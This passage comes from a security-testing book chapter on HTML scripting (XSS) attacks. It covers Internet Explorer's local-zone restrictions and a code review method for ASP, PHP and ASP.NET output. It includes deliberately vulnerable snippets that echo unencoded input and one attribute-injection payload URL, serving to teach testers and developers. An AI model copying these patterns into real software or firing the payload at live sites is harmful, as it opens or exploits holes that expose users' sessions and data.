For attackers, who want to run script in the My Computer zone, this news is both bad and good. Their objective is made more difficult because by default script won’t run inside Internet Explorer. However, attackers aren’t totally shut down because only Internet Explorer is prohibited by default from running script in the My Computer zone. If attackers can find a program that hosts Trident and can get Trident to load their file from the local hard disk, they will be able to take advantage of XSS and script injection bugs in the My Computer zone. Microsoft FrontPage, RealNetworks RealPlayer, and Nullsoft Winamp are just a few of the applications that host Trident.

Important

Any of the restrictions imposed by Windows XP SP2 (local machine lockdown, MIME sniffing, etc.) can be bypassed by an application that hosts the Internet Explorer rendering engine (Trident) and has not opted in to the additional restrictions. Currently, very few applications have opted in.

Internet Explorer attempts to block attackers, but programmers cannot use this functionality as an excuse for not fixing XSS and script injection issues in the My Computer zone. As discussed earlier, there are ways to bypass the Internet Explorer protection, which you can certainly use in your test attacks.

Tip

HTML scripting attacks aren’t limited to HTML. Other formats such as XML also run script in the browser. These formats are potentially vulnerable to HTML scripting attacks if the contents contain user-supplied data that is not properly encoded or validated.

Identifying HTML Scripting Vulnerabilities

Use the following steps to help you identify HTML scripting bugs:

Identify all places where user-supplied data can be sent to the application. This can be a big job. To accomplish this task use the steps listed in Chapter 4 to identify valid network requests. Don’t forget to talk with the developer, if possible, and use Web proxies to obtain the query string parameters, POST data, cookie values, and custom HTTP headers. It is useful to keep a list of all valid input and test each one carefully.
Send valid-looking data to the application.
Verify whether any of the data is returned to the Web browser.
If the data is stored on the server or in the local file system, send data that allows script to be returned to the browser (persisted XSS).
If the data is echoed for the request but is not stored, find ways to force the victim to send data and have it run as script on the client’s machine (reflected XSS).
Look for XSS bugs in client-side script by auditing the script to identify ways that data might be run as script.

Finding HTML Scripting Bugs Through Code Review

The basic logic of review code for HTML scripting attacks is as follows:

Identify all places content is returned to the Web browser or where a client application writes data to the file system (for script injection in local files).
Check whether the output could include attacker-supplied data.
If attacker-supplied data is returned, verify that it is properly validated and/or encoded before being returned.

It is usually recommended for most security issues that you start where attacker-supplied data enters the application and follow it all the way through. As you can see, the preceding approach is the reverse of that. Although to make a comprehensive security pass we still recommend using the approach of starting at the point where attacker data enters the application, but because HTML scripting attacks are a problem related to output, starting with the output and working backward is both effective and efficient.

Identifying All Places Content Is Returned to the Web Browser or File System

To accomplish the first step in the code review, you must understand which functions are used to return data to the Web browser or file system. The following table shows common functions for returning data to the Web browser.

Language	Function
ASP	Response.Write Response.BinaryWrite <%=strVariable%>
PHP	echo print printf <?=$variable?>

Determining Whether Output Contains Attacker-Supplied Data

Now that you have identified all of the code that returns data to the browser or the file system, you must determine whether it includes attacker-supplied data. There is no HTML scripting threat if the output cannot contain attacker-supplied data. Common ways to obtain data from an attacker include HTTP form variables and data from the database (where an attacker’s data might have been previously stored). The functions shown in the following table are commonly used to read attacker-supplied input.

Language	Function
ASP	Form("variable") Request.Form("variable") Request.QueryString("variable") Request.ServerVariables("QUERY_STRING") recordSet("columnName")
PHP	$_GET['variable'] $_POST['variable'] $_REQUEST['variable'] $HTTP_POST_VARS['variable'] Server("QUERY_STRING"); msql_query mysql_query sybase_query

Language

Function

ASP

Form("variable")
Request.Form("variable")
Request.QueryString("variable")
Request.ServerVariables("QUERY_STRING")
recordSet("columnName")

PHP

$_GET['variable']
$_POST['variable']
$_REQUEST['variable']
$HTTP_POST_VARS['variable']
Server("QUERY_STRING");
msql_query
mysql_query
sybase_query

Verifying That Attacker Data Is Properly Validated and/or Encoded

Once you have identified places where data can be specified by an attacker and returned to the victim (HTML returned from the server or local files for client applications), you must verify that the code validates and/or encodes the data to avoid allowing script to run. Sometimes this is straightforward, but not always. It really depends on the application. The following is a simple example of an XSS bug present in an ASP page and the equivalent code in PHP.

ASP	Response.Write "Hello, " + Form("name") + "! Nice to meet you."
PHP	echo "Hello, ", $_GET['name'],"! Nice to meet you.";

Both lines of code take untrusted user input from the URL as a GET parameter named name and then echo it back to the Web browser without validating it. By searching through code to find lines that contain common output and input functions, you can quickly find bugs like this. However, this approach will not work with slight variations that accomplish the same effect. For example, the output of the following code is equivalent to the preceding example except the input is retrieved on a line separate from where the output is generated.

ASP	username = Form("name") Response.Write "Hello, " + username + "! Nice to meet you."
PHP	$userName = $_GET['name']; echo "Hello, ", $_GET['name'],"! Nice to meet you.";

Once you examine the code, it is easy to determine that userName is untrusted data coming in as a GET parameter. As you might suspect, tracing backward through the code to determine whether the origin is attacker controlled is very common in an XSS code review.

Remember that validating and/or encoding attacker-supplied data doesn’t always prevent HTML scripting attacks. It is important to verify the correct protection is in place. Sometimes this is easy to spot; other times, using knowledge of the code to generate test cases proves effective. The following lines of code incorrectly encode the attacker-controlled input before returning it.

ASP	Response.Write "<INPUT type='text' name='username' value=' " + Server.HtmlEncode(Form("username"), "'>"
PHP	echo "<INPUT type='text' name='username' value=' ", strip_tags ($_GET['name']), "'>";

The PHP example removes HTML tags from the input by using the strip_tags function. The ASP example HTML-encodes the data. However, because both strip_tags and HTMLEncode allow single quotation marks to be returned, and because the attacker’s data is enclosed in single quotation marks, an attacker can close off the value tag with a single quotation mark and inject an attribute of choice. For example, the URL http://server/test.php?name=’%20onclick=alert(document.domain);// runs script when the victim clicks the input text control returned on the Web page.

Table 10-4 shows common encoding functions and how each modifies the data passed to it.

Table 10-4. Common Encoding Functions

Language	Function	Description
ASP	HtmlEncode UrlEncode	Modifies angle brackets (< >), quotation marks (”), and the ampersand (&) to their corresponding HTML entities (<, >, ", and &, respectively). This function does not modify single quotation marks. Encodes all nonalphanumeric characters except for the hyphen (-) and underscore (_). For example, characters such as the question mark (?), ampersand (&), forward slash (/), quotation marks (”), and colon (:) are returned as %3f, %26, $3f, %22, and %3a, respectively. This is the encoding described in RFC 1738.
PHP	htmlspecialchars / htmlentities	Encodes <, >, and & like ASP’s HtmlEncode. Single and double quotation marks can be encoded depending on the flags passed in. See http://us2.php.net/manual/en/function.htmlspecialchars.php for more information.
	Rawurlencode	Same as ASP’s UrlEncode.
	Urlencode	Same as Rawurlencode except spaces are substituted with the plus sign (+).
	strip_tags	Modified HTML tags. For more information, see http://us2.php.net/manual/en/function.strip-tags.php.

ASP.NET Automatically Encodes the Data... Sometimes

Classic ASP and PHP both require the programmer to generate all of the HTML output by hand (either in static HTML or code-generated output). ASP.NET has the notion of form controls. Creating an ASP.NET Web page is similar to creating a Windows application.

Any controls the programmer wishes to use are placed on the Web page and assigned a name. Each control has properties associated with it. For example, a text box has a property called text. Instead of printing out the HTML tag for the text box with the value set, the programmer only needs to set the value of the text box on the server. For example, the following code sets the value of a text box:

this.txtBox.Text = Request.Form["name"];

If the input form contained “Tom”, ASP.NET generates the following HTML when the page is displayed:

<INPUT type= "text" name= "txtBox" value= "Tom">

At first glance, this appears to be an XSS bug because the programmer isn’t encoding the value before setting it as the text property of the text box. However, ASP.NET automatically HTML-encodes the text value of this form control before returning it. This prevents the XSS bug.

Not all ASP.NET controls automatically encode data. Sometimes developers introduce cross-site scripting bugs because they believe that all controls encode. For example, we found several XSS bugs where the developer believed the text property of the label control automatically encoded the data, which it doesn’t. The Excel spreadsheet included on the companion Web site lists many common ASP.NET controls, their properties, and whether the property is automatically encoded. Use this reference when code reviewing ASP.NET code for cross-site scripting bugs.

Summary

HTML scripting vulnerabilities are prevalent, but not limited to Web applications. These vulnerabilities also occur in client applications that render HTML content or write out non-HTML content that could be sniffed and interpreted as HTML. HTML scripting attacks enable an attacker to run script in a security context where the attacker is not normally allowed to author script. Many clever test cases attempt to run script when an application attempts to block or filter attacker-supplied input. You can use both the black box and white box approaches discussed in this chapter to help identify HTML scripting bugs.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.

Table of Contents for 10. HTML Scripting Attacks

Create new playlist

Sign In

Sign Up

Chapter 10. HTML Scripting Attacks

Understanding Reflected Cross-Site Scripting Attacks Against Servers

Tip

Example: Reflected XSS in a Search Engine

Understanding Why XSS Attacks Are a Security Concern

Tip

Note

Exploiting Server-Reflected XSS Bugs

Tip

POSTs Are Exploitable, Too

Example: Exploiting POST Data in helloPostDemo.asp

Tip

Getting Victims to Submit Malicious POST Data

Tip

Creating a Test to Exploit This Vulnerability

Understanding Persistent XSS Attacks Against Servers

Example: Persistent XSS in a Web Guestbook

Note

Exploiting Persistent XSS Against Servers

Identifying Attackable Data for Reflected and Persistent XSS Attacks

Tip

Sometimes More Than the <script> Tag Is Needed

Tip

Common Ways Programmers Try to Stop Attacks

HTML-Encoded Data Doesn’t Always Stop the Attack

Stuck in a Script Block

Using Events

Using Styles

Scripting Protocols

Important

Understanding Reflected XSS Attacks Against Local Files

Example: Local HTML File Reflected XSS

Exploiting Reflected XSS Bugs in Local Files

Understanding Why Local XSS Bugs Are an Issue

Tip

Important

Using Local XSS Bugs to Run Binaries on the Victim’s Machine

More Info

HTML Resources

Finding HTML Resources in Files

Example of Running Script Through HTML Resources

Compiled Help Files

Using HTML Help Workshop to Decompile a CHM File

Note

Example of XSS in a CHM File

Exploiting CHMs Using Protocol Handlers

Finding XSS Bugs in Client-Side Script

Note

Understanding Script Injection Attacks in the My Computer Zone

Example: Script Injection in Winamp Playlist

Non-HTML Files Parsed as HTML

More Info

Ways Programmers Try to Prevent HTML Scripting Attacks

Filters

Removing Strings from Input Before Returning It

Blocking Breaking Out of an Attribute by Escaping

Gaining In-Depth Understanding of the Browser’s Parser

Tip

Comments in Styles

Character Sets

Tip

ASP.NET Built-in Filters

Important

Understanding How Internet Explorer Mitigates XSS Attacks Against Local Files

Links from the Internet to the My Computer Zone Are Blocked

Script Disabled in the My Computer Zone by Default

Important

Tip

Identifying HTML Scripting Vulnerabilities

Finding HTML Scripting Bugs Through Code Review

Identifying All Places Content Is Returned to the Web Browser or File System

Determining Whether Output Contains Attacker-Supplied Data

Verifying That Attacker Data Is Properly Validated and/or Encoded

ASP.NET Automatically Encodes the Data... Sometimes

Summary

Table of Contents for
10. HTML Scripting Attacks